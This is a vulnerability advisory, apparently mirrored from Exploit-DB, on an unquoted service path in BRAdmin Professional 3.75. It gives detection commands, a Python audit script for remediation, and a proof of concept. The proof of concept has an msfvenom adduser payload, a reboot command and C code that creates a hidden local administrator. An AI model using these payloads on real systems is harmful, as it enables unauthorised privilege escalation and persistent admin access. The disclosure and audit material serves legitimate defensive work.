# BRAdmin Professional 3.75 - Unquoted Service Path

*"BRAdmin Professional 3.75 software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices."*

## Proof Of Concept

If a user can place an executable named "BRAdmin" in the `C:\Program Files (x86)\Brother\` directory, that user can obtain local system privileges.

For example, a user who has administrative privileges can obtain **`SYSTEM`** privileges through the vulnerable service.

This is especially valuable if an unprivileged user has been granted additional write permission on the `\Brother\` directory.

```
#Detection of unquoted service path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """
Brother BRAdminPro Scheduler
BRA_Scheduler                             
C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe                 
Auto


C:\>sc qc BRA_Scheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BRA_Scheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Brother BRAdminPro Scheduler
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```
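The audit below is an added example, not part of the original advisory: it parses `sc qc` output and lists the image paths Windows tries before the intended one when the path is unquoted, plus the directories whose write ACLs therefore need checking. The function names and the `QuotedDemo` entry are constructed for illustration.

```python
import ntpath
import re

# `sc qc` output. BRA_Scheduler is the entry from this page; QuotedDemo is a
# constructed entry showing the same path in its remediated, quoted form.
SC_QC_OUTPUT = r'''
SERVICE_NAME: BRA_Scheduler
        BINARY_PATH_NAME   : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
SERVICE_NAME: QuotedDemo
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe" /run
'''

def parse_services(text):
    """Map SERVICE_NAME to BINARY_PATH_NAME from concatenated `sc qc` output."""
    services, name = {}, None
    for line in text.splitlines():
        key, _, value = line.partition(":")   # first colon separates field and value
        key, value = key.strip(), value.strip()
        if key == "SERVICE_NAME":
            name = value
        elif key == "BINARY_PATH_NAME" and name:
            services[name] = value
    return services

def candidate_paths(binary_path):
    """Images Windows tries, in order, before the intended one if the path is unquoted."""
    if binary_path.startswith('"'):
        return []                              # quoted: resolved as a single path
    # Only spaces inside the executable path matter, not spaces between arguments.
    m = re.match(r"(.*?\.exe)(?=\s|$)", binary_path, re.IGNORECASE)
    exe = m.group(1) if m else binary_path
    prefixes = [exe[:i] for i, ch in enumerate(exe) if ch == " "]
    return [p if ntpath.splitext(p)[1] else p + ".exe" for p in prefixes]

def directories_to_audit(binary_path):
    """Distinct parent directories whose write ACLs must exclude unprivileged users."""
    dirs = []
    for path in candidate_paths(binary_path):
        parent = ntpath.dirname(path)
        if parent not in dirs:
            dirs.append(parent)
    return dirs

if __name__ == "__main__":
    for svc, path in parse_services(SC_QC_OUTPUT).items():
        print(svc, "->", directories_to_audit(path) or "quoted or space-free path")
```

An empty result for the quoted entry shows the remediation: once the service's binary path is wrapped in double quotes, no intermediate image is tried.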

### Steps to Reproduce:

1- The user has write privileges on the `\Brother\` directory and creates an msfvenom payload that adds a new local administrator user to the Windows computer.

```
msfvenom -p windows/adduser USER=unsafe PASS=In.line13 -f exe > BRAdmin.exe 
```

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW5zkMBfskxH_VwPbkz%2F-MW606TdKMT5kaEvNWVP%2F1.PNG?alt=media\&token=98b14885-f4be-4636-9b35-88f7bd0957c1)

2- The user then downloads this executable into the `\Brother\` directory and restarts the computer.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW5zkMBfskxH_VwPbkz%2F-MW61MLiQVlXsP-RHuzg%2F2.PNG?alt=media\&token=87daf106-6185-468a-8df4-29a5c10cc971)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW61NnxEi2SLYr2jRfO%2F-MW61SiZLh4N3XUrf6iS%2F3.PNG?alt=media\&token=c49a70bc-fdca-4baa-8fce-58d8b898c61d)

To restart the computer from the command line:

```
shutdown /r /t 0
```

3- After the restart, the `unsafe` user will have been created and added to the local Administrators group.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW62vm1QrzGWWCEVBaQ%2F-MW63ikVCka-O_O1Fz_f%2F4.PNG?alt=media\&token=14d54279-6849-4964-97bf-2630e65aa112)

Windows Defender will detect the `BRAdmin.exe` executable as malicious after the `unsafe` user has been added to the local Administrators group if the target has not properly applied the latest Windows update.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW63joxx3I9hipyVbs1%2F-MW67LrjVf9X8HtXyIAr%2F5.PNG?alt=media\&token=86bb2f61-89e3-4785-a8d7-6c926debe1d0)

Alternatively, the code below can be used after compiling it with gcc.

```
#include <stdlib.h>

int main(void)
{
    int i;

    /* Runs with the privileges of the process that starts this binary. */
    i = system("net user joker j@k3r.. /add & net localgroup Administrators joker /add");
    return 0;
}
```

`i686-w64-mingw32-gcc addLocalAdmin.c -lws2_32 -o add.exe`

Exploit-DB entry: <https://www.exploit-db.com/exploits/49671>

Author: Metin Yunus Kandemir


